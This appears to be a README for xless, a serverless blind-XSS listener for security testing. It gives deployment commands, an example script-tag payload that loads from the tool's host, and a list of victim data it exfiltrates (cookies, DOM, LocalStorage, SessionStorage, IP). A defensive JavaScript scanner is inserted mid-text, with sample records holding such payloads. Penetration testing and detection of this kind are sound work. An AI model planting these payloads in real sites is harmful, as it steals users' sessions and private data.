xless: The Serverless Blind XSS App
xless is a serverless blind XSS app that can be used to identify blind XSS vulnerabilities using your own deployed version of the app. There is no need to run a full deployment process; just set up a zeit.co account and run bash deploy.sh. That's it: you have a fully running blind XSS listener that uses Slack to notify you of blind XSS callbacks.
Requirements
- zeit.co account: Zeit provides a free plan for serverless. If you use another provider for serverless, code changes should be minimal.
- Slack Incoming Webhook URL.
Deployment
- Run:
$ git clone https://github.com/mazen160/xless.git
$ cd xless
$ bash deploy.sh
> Deploying ~/xless under X
> https://xless.now.sh [v2] [in clipboard] [4s]
> Success! Deployment ready [4s]
- Use the URL for blind XSS testing 🔥
Xless will automatically serve the XSS payload, collect information, and exfiltrate it to your serverless app, which then forwards it to you in Slack.
Example Payload
<script src="https://xless.now.sh"></script>
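From the defender's side, a payload of this shape is a script tag whose src points at a host the application does not own, sitting in stored data until a back-office page renders it. The following is an added example, not part of the xless project: a heuristic scan of stored fields for such tags. The allowlist, the site origin and the sample records are constructed assumptions.

```javascript
// Added defensive example: flag stored fields that contain a <script src=...>
// pointing at a host outside the site's allowlist (the payload shape shown above).
// ALLOWED_SCRIPT_HOSTS, SITE_ORIGIN and the sample records are assumptions.
const ALLOWED_SCRIPT_HOSTS = new Set(["app.example.com", "cdn.example.com"]);
const SITE_ORIGIN = "https://app.example.com";

// Heuristic: a script start tag with a quoted or unquoted src attribute.
const SCRIPT_SRC = /<script\b[^>]*?\bsrc\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))/gi;

function externalScriptHosts(text) {
  const hosts = [];
  for (const m of text.matchAll(SCRIPT_SRC)) {
    const raw = m[1] ?? m[2] ?? m[3];
    let url;
    try {
      // Resolves relative and protocol-relative (//host/x.js) references.
      url = new URL(raw, SITE_ORIGIN);
    } catch {
      continue; // unparsable src: skip it
    }
    if (!ALLOWED_SCRIPT_HOSTS.has(url.hostname)) hosts.push(url.hostname);
  }
  return hosts;
}

function scanRecords(records) {
  const findings = [];
  for (const rec of records) {
    for (const [field, value] of Object.entries(rec.fields)) {
      if (typeof value !== "string") continue;
      const hosts = externalScriptHosts(value);
      if (hosts.length) findings.push({ id: rec.id, field, hosts });
    }
  }
  return findings;
}

// Constructed sample data: values as they might sit in a support-ticket table.
const SAMPLE_RECORDS = [
  { id: 1, fields: { name: "Alice", message: "Login page is slow" } },
  { id: 2, fields: { name: '<script src="https://xless.now.sh"></script>', message: "hi" } },
  { id: 3, fields: { name: "Bob", message: "<SCRIPT SRC=//collector.example.net/x></SCRIPT>" } },
  { id: 4, fields: { name: "Eve", message: '<script src="/static/app.js"></script>' } },
];

console.log(JSON.stringify(scanRecords(SAMPLE_RECORDS), null, 2));
```

A scan like this only surfaces candidates for review; output encoding at render time and a Content-Security-Policy that restricts script sources are what stop the script from loading.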
Collected Data
- Cookies
- User-Agent
- HTTP Referrer
- Browser DOM
- Browser Time
- Document Location
- Origin
- LocalStorage
- SessionStorage
- IP Address
Copyright (C) 2019 Mazin Ahmed
Source: https://github.com/mazen160/